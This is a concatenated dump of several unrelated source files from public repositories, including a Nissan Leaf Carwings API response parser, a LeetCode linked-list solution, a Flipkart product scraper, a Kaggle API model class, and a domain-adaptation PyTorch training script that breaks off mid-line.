\"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\"\n },\n \"OperationDateAndTime\":\"\"\n }\n\n climate control off:\n {\n \"status\":200,\n \"message\":\"success\",\n \"RemoteACRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 10, 2016 10:26 PM\",\n \"RemoteACOperation\":\"STOP\",\n \"ACStartStopDateAndTime\":\"Feb 10, 2016 10:27 PM\",\n \"CruisingRangeAcOn\":\"111936.0\",\n \"CruisingRangeAcOff\":\"113632.0\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"NOT_CONNECTED\",\n \"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\"\n },\n \"OperationDateAndTime\":\"\"\n }\n\n error:\n {\n \"status\":200,\n \"RemoteACRecords\":{\n \"OperationResult\":\"ELECTRIC_WAVE_ABNORMAL\",\n \"OperationDateAndTime\":\"2018/04/08 10:00\",\n \"RemoteACOperation\":\"START\",\n \"ACStartStopDateAndTime\":\"08-Apr-2018 11:06\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"INVALID\",\n \"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\",\n \"PreAC_unit\":\"C\",\n \"PreAC_temp\":\"22\"\n }\n }\n noinfo (from a 2014 24kWh Leaf):\n {\n \"status\":200,\n \"RemoteACRecords\":[]\n }\n\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status[\"RemoteACRecords\"])\n racr = status[\"RemoteACRecords\"]\n\n self._set_cruising_ranges(racr, on_key=\"CruisingRangeAcOn\", off_key=\"CruisingRangeAcOff\")\n\n # If no empty RemoteACRecords list is returned then assume CC is off.\n if type(racr) is not dict:\n self.is_hvac_running = False\n else:\n # Seems to be running only if both of these contain \"START\".\n self.is_hvac_running = (\n racr[\"OperationResult\"] and\n racr[\"OperationResult\"].startswith(\"START\") and\n racr[\"RemoteACOperation\"] == \"START\"\n )\n\n\nclass CarwingsStartClimateControlResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START_BATTERY\",\n \"acContinueTime\":\"15\",\n \"cruisingRangeAcOn\":\"106400.0\",\n \"cruisingRangeAcOff\":\"107920.0\",\n \"timeStamp\":\"2016-02-05 12:59:46\",\n \"hvacStatus\":\"ON\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self._set_cruising_ranges(status)\n\n self.operation_result = status[\"operationResult\"] # e.g. \"START_BATTERY\", ...?\n self.ac_continue_time = timedelta(minutes=float(status[\"acContinueTime\"]))\n self.hvac_status = status[\"hvacStatus\"] # \"ON\" or \"OFF\"\n self.is_hvac_running = (\"ON\" == self.hvac_status)\n\n\nclass CarwingsStopClimateControlResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START\",\n \"timeStamp\":\"2016-02-09 03:32:51\",\n \"hvacStatus\":\"OFF\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self.hvac_status = status[\"hvacStatus\"] # \"ON\" or \"OFF\"\n self.is_hvac_running = (\"ON\" == self.hvac_status)\n\n\nclass CarwingsClimateControlScheduleResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"LastScheduledTime\":\"Feb 9, 2016 05:39 PM\",\n \"ExecuteTime\":\"2016-02-10 01:00:00\",\n \"DisplayExecuteTime\":\"Feb 9, 2016 08:00 PM\",\n \"TargetDate\":\"2016/02/10 01:00\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self.display_execute_time = status[\"DisplayExecuteTime\"] # displayable, timezone-adjusted\n self.execute_time = datetime.strptime(status[\"ExecuteTime\"] + \" UTC\", \"%Y-%m-%d %H:%M:%S %Z\") # GMT\n self.display_last_scheduled_time = status[\"LastScheduledTime\"] # displayable, timezone-adjusted\n self.last_scheduled_time = datetime.strptime(status[\"LastScheduledTime\"], \"%b %d, %Y %I:%M %p\")\n # unknown purpose; don't surface to avoid confusion\n # self.target_date = status[\"TargetDate\"]\n\n\nclass CarwingsDrivingAnalysisResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"DriveAnalysisBasicScreenResponsePersonalData\": {\n \"DateSummary\":{\n \"TargetDate\":\"2016-02-03\",\n \"ElectricMileage\":\"4.4\",\n \"ElectricMileageLevel\":\"3\",\n \"PowerConsumptMoter\":\"295.2\",\n \"PowerConsumptMoterLevel\":\"4\",\n \"PowerConsumptMinus\":\"84.8\",\n \"PowerConsumptMinusLevel\":\"3\",\n \"PowerConsumptAUX\":\"17.1\",\n \"PowerConsumptAUXLevel\":\"5\",\n \"DisplayDate\":\"Feb 3, 16\"\n },\n \"ElectricCostScale\":\"miles/kWh\"\n },\n \"AdviceList\":{\n \"Advice\":{\n \"title\":\"World Number of Trips Rankings (last week):\",\n \"body\":\"The highest number of trips driven was 130 by a driver located in Japan.\"\n }\n }\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n summary = status[\"DriveAnalysisBasicScreenResponsePersonalData\"][\"DateSummary\"]\n\n # avg energy economy, in units of 'electric_cost_scale' (e.g. miles/kWh)\n self.electric_mileage = summary[\"ElectricMileage\"]\n # rating for above, scale of 1-5\n self.electric_mileage_level = summary[\"ElectricMileageLevel\"]\n\n # \"acceleration performance\": \"electricity used for motor activation over 1km\", Watt-Hours\n self.power_consumption_moter = summary[\"PowerConsumptMoter\"]\n # rating for above, scale of 1-5\n self.power_consumption_moter_level = summary[\"PowerConsumptMoterLevel\"]\n\n # Watt-Hours generated by braking\n self.power_consumption_minus = summary[\"PowerConsumptMinus\"]\n # rating for above, scale of 1-5\n self.power_consumption_minus_level = summary[\"PowerConsumptMinusLevel\"]\n\n # Electricity used by aux devices, Watt-Hours\n self.power_consumption_aux = summary[\"PowerConsumptAUX\"]\n # rating for above, scale of 1-5\n self.power_consumption_aux_level = summary[\"PowerConsumptAUXLevel\"]\n\n self.display_date = summary[\"DisplayDate\"] # \"Feb 3, 16\"\n\n self.electric_cost_scale = status[\"DriveAnalysisBasicScreenResponsePersonalData\"][\"ElectricCostScale\"]\n\n self.advice = [status[\"AdviceList\"][\"Advice\"]] # will contain \"title\" and \"body\"\n\n\nclass CarwingsLatestBatteryStatusResponse(CarwingsResponse):\n \"\"\"\n # not connected to a charger\n {\n \"status\":200,\n \"message\":\"success\",\n \"BatteryStatusRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 9, 2016 11:09 PM\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"NOT_CHARGING\",\n \"BatteryCapacity\":\"12\",\n \"BatteryRemainingAmount\":\"3\",\n \"BatteryRemainingAmountWH\":\"\",\n \"BatteryRemainingAmountkWH\":\"\"\n },\n \"PluginState\":\"NOT_CONNECTED\",\n \"CruisingRangeAcOn\":\"39192.0\",\n \"CruisingRangeAcOff\":\"39744.0\",\n \"TimeRequiredToFull\":{ # 120V\n \"HourRequiredToFull\":\"18\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"TimeRequiredToFull200\":{ # 240V, 3kW\n \"HourRequiredToFull\":\"6\",\n \"MinutesRequiredToFull\":\"0\"\n },\n \"TimeRequiredToFull200_6kW\":{ # 240V, 6kW\n \"HourRequiredToFull\":\"4\",\n \"MinutesRequiredToFull\":\"0\"\n },\n \"NotificationDateAndTime\":\"2016/02/10 04:10\",\n \"TargetDate\":\"2016/02/10 04:09\"\n }\n }\n\n # not connected to a charger - as at 21/01/2019 20:01 (for a 30kWh leaf)\n {\n \"status\":200,\n \"BatteryStatusRecords\": {\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"21-Jan-2019 13:29\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"NOT_CHARGING\",\n \"BatteryCapacity\":\"240\",\n \"BatteryRemainingAmount\":\"220\",\n \"BatteryRemainingAmountWH\":\"24480\",\n \"BatteryRemainingAmountkWH\":\"\",\n \"SOC\":{\n \"Value\":\"91\"\n }\n },\n \"PluginState\":\"NOT_CONNECTED\",\n \"CruisingRangeAcOn\":\"146000\",\n \"CruisingRangeAcOff\":\"168000\",\n \"TimeRequiredToFull\":{\n \"HourRequiredToFull\":\"4\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"TimeRequiredToFull200\":{\n \"HourRequiredToFull\":\"3\"\n ,\"MinutesRequiredToFull\":\"0\"\n },\n \"TimeRequiredToFull200_6kW\":{\n \"HourRequiredToFull\":\"1\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"NotificationDateAndTime\":\"2019/01/21 13:29\",\n \"TargetDate\":\"2019/01/21 13:29\"\n }\n }\n\n\n # connected to a quick charger\n {\n \"status\":200,\n \"message\":\"success\",\n \"BatteryStatusRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 14, 2016 03:28 PM\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"RAPIDLY_CHARGING\",\n \"BatteryCapacity\":\"12\",\n \"BatteryRemainingAmount\":\"11\",\n \"BatteryRemainingAmountWH\":\"\",\n \"BatteryRemainingAmountkWH\":\"\"\n },\n \"PluginState\":\"QC_CONNECTED\",\n \"CruisingRangeAcOn\":\"107136.0\",\n \"CruisingRangeAcOff\":\"115776.0\",\n \"NotificationDateAndTime\":\"2016/02/14 20:28\",\n \"TargetDate\":\"2016/02/14 20:28\"\n }\n }\n\n # connected to a charging station\n {\n \"status\": 200,\n \"message\": \"success\",\n \"BatteryStatusRecords\": {\n \"OperationResult\": \"START\",\n \"OperationDateAndTime\": \"Feb 19, 2016 12:12 PM\",\n \"BatteryStatus\": {\n \"BatteryChargingStatus\": \"NORMAL_CHARGING\",\n \"BatteryCapacity\": \"12\",\n \"BatteryRemainingAmount\": \"12\",\n \"BatteryRemainingAmountWH\": \"\",\n \"BatteryRemainingAmountkWH\": \"\"\n },\n \"PluginState\": \"CONNECTED\",\n \"CruisingRangeAcOn\": \"132000.0\",\n \"CruisingRangeAcOff\": \"134000.0\",\n \"TimeRequiredToFull200_6kW\": {\n \"HourRequiredToFull\": \"0\",\n \"MinutesRequiredToFull\": \"40\"\n },\n \"NotificationDateAndTime\": \"2016/02/19 17:12\",\n \"TargetDate\": \"2016/02/19 17:12\"\n }\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status[\"BatteryStatusRecords\"])\n self.answer = status\n\n recs = status[\"BatteryStatusRecords\"]\n\n bs = recs[\"BatteryStatus\"]\n self.battery_capacity = bs[\"BatteryCapacity\"]\n self.battery_remaining_amount = bs[\"BatteryRemainingAmount\"]\n self.charging_status = bs[\"BatteryChargingStatus\"]\n self.is_charging = (\"NOT_CHARGING\" != bs[\"BatteryChargingStatus\"]) # double negatives are fun\n self.is_quick_charging = (\"RAPIDLY_CHARGING\" == bs[\"BatteryChargingStatus\"])\n\n self.plugin_state = recs[\"PluginState\"]\n self.is_connected = (\"NOT_CONNECTED\" != recs[\"PluginState\"]) # another double negative\n self.is_connected_to_quick_charger = (\"QC_CONNECTED\" == recs[\"PluginState\"])\n\n self._set_cruising_ranges(recs, off_key=\"CruisingRangeAcOff\", on_key=\"CruisingRangeAcOn\")\n\n if \"TimeRequiredToFull\" in recs:\n self.time_to_full_trickle = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull\"]))\n else:\n self.time_to_full_trickle = None\n\n if \"TimeRequiredToFull200\" in recs:\n self.time_to_full_l2 = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull200\"]))\n else:\n self.time_to_full_l2 = None\n\n if \"TimeRequiredToFull200_6kW\" in recs:\n self.time_to_full_l2_6kw = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull200_6kW\"]))\n else:\n self.time_to_full_l2_6kw = None\n\n if float(self.battery_capacity) == 0:\n log.debug(\"battery_capacity=0, status=%s\", status)\n self.battery_percent = 0\n else:\n self.battery_percent = 100 * float(self.battery_remaining_amount) / 12\n\n # Leaf 2016 has SOC (State Of Charge) in BatteryStatus, a more accurate battery_percentage\n if \"SOC\" in bs:\n self.state_of_charge = bs[\"SOC\"][\"Value\"]\n # Update battery_percent with more accurate version\n self.battery_percent = float(self.state_of_charge)\n else:\n self.state_of_charge = None\n\n\nclass CarwingsElectricRateSimulationResponse(CarwingsResponse):\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n r = status[\"PriceSimulatorDetailInfoResponsePersonalData\"]\n t = r[\"PriceSimulatorTotalInfo\"]\n\n self.month = r[\"DisplayMonth\"] # e.g. \"Feb/2016\"\n\n self.total_number_of_trips = t[\"TotalNumberOfTrips\"]\n self.total_power_consumption = t[\"TotalPowerConsumptTotal\"] # in kWh\n self.total_acceleration_power_consumption = t[\"TotalPowerConsumptMoter\"] # in kWh\n self.total_power_regenerated_in_braking = t[\"TotalPowerConsumptMinus\"] # in kWh\n self.total_travel_distance_km = float(t[\"TotalTravelDistance\"]) / 1000 # assumed to be in meters\n\n self.total_electric_mileage = t[\"TotalElectricMileage\"]\n self.total_co2_reduction = t[\"TotalCO2Reductiont\"] # (yep, extra 't' at the end)\n\n self.electricity_rate = r[\"ElectricPrice\"]\n self.electric_bill = r[\"ElectricBill\"]\n self.electric_cost_scale = r[\"ElectricCostScale\"] # e.g. \"miles/kWh\"\n\n\nclass CarwingsMyCarFinderResponse(CarwingsResponse):\n \"\"\"\n {\n \"Location\": {\n \"Country\": \"\",\n \"Home\": \"OUTSIDE\",\n \"LatitudeDeg\": \"69\",\n \"LatitudeMin\": \"41\",\n \"LatitudeMode\": \"NORTH\",\n \"LatitudeSec\": \"5540\",\n \"LocationType\": \"WGS84\",\n \"LongitudeDeg\": \"18\",\n \"LongitudeMin\": \"38\",\n \"LongitudeMode\": \"EAST\",\n \"LongitudeSec\": \"2506\",\n \"Position\": \"UNAVAILABLE\"\n },\n \"TargetDate\": \"2017/11/29 20:02\",\n \"lat\": \"69.698722222222\",\n \"lng\": \"18.640294444444\",\n \"receivedDate\": \"2017/11/29 20:02\",\n \"responseFlag\": \"1\",\n \"resultCode\": \"1\",\n \"status\": 200,\n \"timeStamp\": \"2017-11-29 20:02:45\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self.latitude = status[\"lat\"]\n self.longitude = status[\"lng\"]\n","repo_name":"snaptec/openWB","sub_path":"modules/soc_leaf/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":26971,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"81"} +{"seq_id":"17216204018","text":"'''\nYou are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order,\nand each of their nodes contains a single digit. Add the two numbers and return the sum as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\n\n\nExample 1:\n\nInput: l1 = [2,4,3], l2 = [5,6,4]\nOutput: [7,0,8]\nExplanation: 342 + 465 = 807.\n\nExample 2:\n\nInput: l1 = [0], l2 = [0]\nOutput: [0]\n\nExample 3:\n\nInput: l1 = [9,9,9,9,9,9,9], l2 = [9,9,9,9]\nOutput: [8,9,9,9,0,0,0,1]\n\n\nConstraints:\n\n The number of nodes in each linked list is in the range [1, 100].\n 0 <= Node.val <= 9\n It is guaranteed that the list represents a number that does not have leading zeros.\n\n\n'''\nfrom typing import Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self):\n ln = self\n result = []\n print(\"[\", ln.val, end=\",\")\n result.append(ln.val)\n while ln.next is not None:\n ln = ln.next\n result.append(ln.val)\n print(ln.val, end=\",\")\n print(\"]\")\n return str(result)\n\n\nclass SolutionOne:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n n1 = l1\n num1_s = str(l1.val)\n num1 = int(num1_s)\n while n1.next is not None:\n n1 = n1.next\n num1_s = str(n1.val) + num1_s\n num1 = int(num1_s)\n # print(num1)\n n2 = l2\n num2_s = str(l2.val)\n num2 = int(num2_s)\n while n2.next is not None:\n n2 = n2.next\n num2_s = str(n2.val) + num2_s\n num2 = int(num2_s)\n # print(num2)\n result = num1 + num2\n result_s = str(result)\n # print(result_s)\n prev_node = None\n result_l = ListNode()\n for c in result_s:\n result_l = ListNode(val=int(c), next=prev_node)\n prev_node = result_l\n return result_l\n\n\nif __name__ == '__main__':\n sol = SolutionOne()\n l1 = ListNode(2, next=ListNode(4, next=ListNode(3, None)))\n l2 = ListNode(5, next=ListNode(6, next=ListNode(4, None)))\n output = str(ListNode(7, next=ListNode(0, next=ListNode(8, None))))\n result = str(sol.addTwoNumbers(l1, l2))\n print(\"out\", output)\n print(\"res\", str(result))\n assert output == result\n","repo_name":"rishavpreet/LeetCodeJourney","sub_path":"Medium/Add Two Numbers.py","file_name":"Add Two Numbers.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27649705098","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom html.parser import HTMLParser\npage_num= input (\"Enter number of page numbers:\")\nfor r in range(1,int(page_num)):\n URL= \"https://www.flipkart.com/search?q=air+fryer&sid=j9e%2Cm38%2Cj1e&as=on&as-show=on&otracker=AS_QueryStore_OrganicAutoSuggest_1_4_na_na_na&otracker1=AS_QueryStore_OrganicAutoSuggest_1_4_na_na_na&as-pos=1&as-type=HISTORY&suggestionId=air+fryer%7CAir+Fryers&requestId=dadfe4e4-56a6-4849-8691-9eeb601df480&page=\"+str(r)\n headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0\"}\n page = requests.get(URL,headers=headers)\n page.raise_for_status()\n soup = BeautifulSoup(page.text,\"html.parser\")\n #print(soup)\n products=[]\n prices=[]\n ratings=[]\n flip_results = soup.find_all('div',{'class':'_4ddWXP'})\n print (len(flip_results))\n for i in flip_results:\n pd_name = i.find('a',{'class':'s1Q9rs'}).text\n print(pd_name)\n price = i.find('div',{'class':'_30jeq3'}).text\n print(price)\n rating = i.span.text\n print(rating)\n products.append(pd_name)\n ratings.append(rating)\n prices.append(price)\n df = pd.DataFrame({'Product Name':products,'Prices':prices,'Ratings':ratings})\n df.head()\n df.to_csv('air_fryer.csv')\n\n\n","repo_name":"SrutiVS/scraping","sub_path":"flip1_scrap.py","file_name":"flip1_scrap.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37296252396","text":"import dataclasses\nfrom configparser import ConfigParser\nfrom pathlib import Path\n\nCONFIG_FILE = Path(__file__).parent.parent / \"config.ini\"\n\n\n@dataclasses.dataclass\nclass SerialDevice:\n port: str\n baudrate: int\n\n\ndef config_loader() -> list[SerialDevice]:\n config = ConfigParser()\n config.read(CONFIG_FILE)\n section = config[\"managed devices\"]\n managed_devices: list[SerialDevice] = []\n for d in section:\n port, br = section[d].split(\",\")\n managed_devices.append(SerialDevice(port=port, baudrate=br))\n return managed_devices\n\n\nif __name__ == \"__main__\":\n print(config_loader())\n","repo_name":"va771/mb77-controller","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11554859438","text":"#!/usr/bin/python\n#\n# Copyright 2023 Kaggle Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding: utf-8\r\n\r\n\"\"\"\r\n Kaggle API\r\n\r\n API for kaggle.com # noqa: E501\r\n\r\n OpenAPI spec version: 1\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\n\r\nclass Collaborator(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'username': 'str',\r\n 'role': 'str'\r\n }\r\n\r\n attribute_map = {\r\n 'username': 'username',\r\n 'role': 'role'\r\n }\r\n\r\n def __init__(self, username=None, role=None): # noqa: E501\r\n \"\"\"Collaborator - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._username = None\r\n self._role = None\r\n self.discriminator = None\r\n\r\n self.username = username\r\n self.role = role\r\n\r\n @property\r\n def username(self):\r\n \"\"\"Gets the username of this Collaborator. # noqa: E501\r\n\r\n Username of the collaborator # noqa: E501\r\n\r\n :return: The username of this Collaborator. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._username\r\n\r\n @username.setter\r\n def username(self, username):\r\n \"\"\"Sets the username of this Collaborator.\r\n\r\n Username of the collaborator # noqa: E501\r\n\r\n :param username: The username of this Collaborator. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n if username is None:\r\n raise ValueError(\"Invalid value for `username`, must not be `None`\") # noqa: E501\r\n\r\n self._username = username\r\n\r\n @property\r\n def role(self):\r\n \"\"\"Gets the role of this Collaborator. # noqa: E501\r\n\r\n Role of the collaborator # noqa: E501\r\n\r\n :return: The role of this Collaborator. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._role\r\n\r\n @role.setter\r\n def role(self, role):\r\n \"\"\"Sets the role of this Collaborator.\r\n\r\n Role of the collaborator # noqa: E501\r\n\r\n :param role: The role of this Collaborator. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n if role is None:\r\n raise ValueError(\"Invalid value for `role`, must not be `None`\") # noqa: E501\r\n allowed_values = [\"reader\", \"writer\"] # noqa: E501\r\n if role not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `role` ({0}), must be one of {1}\" # noqa: E501\r\n .format(role, allowed_values)\r\n )\r\n\r\n self._role = role\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, Collaborator):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n","repo_name":"Kaggle/kaggle-api","sub_path":"kaggle/models/collaborator.py","file_name":"collaborator.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":5653,"dataset":"github-code","pt":"81"} +{"seq_id":"17943367505","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport model\nimport transform as tran\nimport adversarial1 as ad\nimport numpy as np\nfrom read_data import ImageList\nimport argparse\nimport os\nimport torch.nn.functional as F\n\n\ntorch.set_num_threads(1)\nparser = argparse.ArgumentParser(description='PyTorch BSP Example')\nparser.add_argument('--gpu_id', type=str, nargs='?', default='0', help=\"device id to run\")\nparser.add_argument('--src', type=str, default='a', metavar='S',\n help='source dataset')\nparser.add_argument('--tgt', type=str, default='d', metavar='S',\n help='target dataset')\nparser.add_argument('--num_iter', type=int, default=50002,\n help='max iter_num')\nargs = parser.parse_args()\n\ndef get_datasetname(args):\n noe = 0\n office = False\n A = './data/Art.txt'\n C = './data/Clipart.txt'\n P = './data/Product.txt'\n R = './data/Real_World.txt'\n if args.src == 'A':\n src = A\n elif args.src == 'C':\n src = C\n elif args.src == 'P':\n src = P\n elif args.src == 'R':\n src = R\n if args.tgt == 'A':\n tgt = A\n elif args.tgt == 'C':\n tgt = C\n elif args.tgt == 'P':\n tgt = P\n elif args.tgt == 'R':\n tgt = R\n a = './data/amazon.txt'\n w = './data/webcam.txt'\n d = './data/dslr.txt'\n if args.src == 'a':\n src = a\n office = True\n elif args.src == 'w':\n src = w\n office = True\n elif args.src == 'd':\n src = d\n noe = noe + 1\n office = True\n if args.tgt == 'a':\n tgt = a\n noe = noe + 1\n elif args.tgt == 'w':\n tgt = w\n elif args.tgt == 'd':\n tgt = d\n return src, tgt, office,noe\n\n\nsrc, tgt, office, noe = get_datasetname(args)\n\nbatch_size = {\"train\": 36, \"val\": 36, \"test\": 4}\n\nbatch_size = {\"train\": 36, \"val\": 36, \"test\": 4}\nfor i in range(10):\n batch_size[\"val\" + str(i)] = 4\n\ndata_transforms = {\n 'train': tran.transform_train(resize_size=256, crop_size=224),\n 'val': tran.transform_train(resize_size=256, crop_size=224),\n }\ndata_transforms = tran.transform_test(data_transforms=data_transforms, resize_size=256, crop_size=224)\ndsets = {\"train\": ImageList(open(src).readlines(), transform=data_transforms[\"train\"]),\n \"val\": ImageList(open(tgt).readlines(), transform=data_transforms[\"val\"]),\n \"test\": ImageList(open(tgt).readlines(),transform=data_transforms[\"val\"])}\ndset_loaders = {x: torch.utils.data.DataLoader(dsets[x], batch_size=batch_size[x],\n shuffle=True, num_workers=4)\n for x in ['train', 'val']}\ndset_loaders[\"test\"] = torch.utils.data.DataLoader(dsets[\"test\"], batch_size=batch_size[\"test\"],\n shuffle=False, num_workers=4)\n\nfor i in range(10):\n dsets[\"val\" + str(i)] = ImageList(open(tgt).readlines(),\n transform=data_transforms[\"val\" + str(i)])\n dset_loaders[\"val\" + str(i)] = torch.utils.data.DataLoader(dsets[\"val\" + str(i)],\n batch_size=batch_size[\"val\" + str(i)], shuffle=False,\n num_workers=4)\n\ndset_sizes = {x: len(dsets[x]) for x in ['train', 'val'] + [\"val\" + str(i) for i in range(10)]}\ndset_classes = range(65)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmax_iter = args.num_iter\n\n\ndef test_target(loader, model, test_iter=0):\n with torch.no_grad():\n start_test = True\n if test_iter > 0:\n iter_val = iter(loader['val0'])\n for i in range(test_iter):\n data = iter_val.next()\n inputs = data[0]\n labels = data[1]\n inputs = inputs.to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n if start_test:\n all_output = outputs.data.float()\n all_label = labels.data.float()\n start_test = False\n else:\n all_output = torch.cat((all_output, outputs.data.float()), 0)\n all_label = torch.cat((all_label, labels.data.float()), 0)\n else:\n iter_val = [iter(loader['val' + str(i)]) for i in range(10)]\n for i in range(len(loader['val0'])):\n data = [iter_val[j].next() for j in range(10)]\n inputs = [data[j][0] for j in range(10)]\n labels = data[0][1]\n for j in range(10):\n inputs[j] = inputs[j].to(device)\n labels = labels.to(device)\n outputs = []\n for j in range(10):\n output = model(inputs[j])\n outputs.append(output)\n outputs = sum(outputs)\n if start_test:\n all_output = outputs.data.float()\n all_label = labels.data.float()\n start_test = False\n else:\n all_output = torch.cat((all_output, outputs.data.float()), 0)\n all_label = torch.cat((all_label, labels.data.float()), 0)\n _, predict = torch.max(all_output, 1)\n accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])\n return accuracy\n\ndef inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005):\n \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"\n lr = init_lr * (1 + gamma * iter_num) ** (-power)\n i = 0\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * param_lr[i]\n param_group['weight_decay'] = weight_decay * 2\n i += 1\n return optimizer\n\n\nclass BSP_CDAN(nn.Module):\n\n def __init__(self, num_feature):\n super(BSP_CDAN, self).__init__()\n self.model_fc = model.Resnet50Fc()\n self.bottleneck_layer1 = nn.Linear(num_feature, 256)\n self.bottleneck_layer1.apply(init_weights)\n self.bottleneck_layer = nn.Sequential(self.bottleneck_layer1, nn.ReLU(), nn.Dropout(0.5))\n self.classifiler_layer = nn.Linear(256, len(dset_classes))\n self.classifiler_layer.apply(init_weights)\n self.predict_layer = nn.Sequential(self.model_fc, self.bottleneck_layer, self.classifiler_layer)\n\n def forward(self, x):\n feature = self.model_fc(x)\n out = self.bottleneck_layer(feature)\n outC = self.classifiler_layer(out)\n\n return out, outC\n\n\ndef init_weights(m):\n classname = 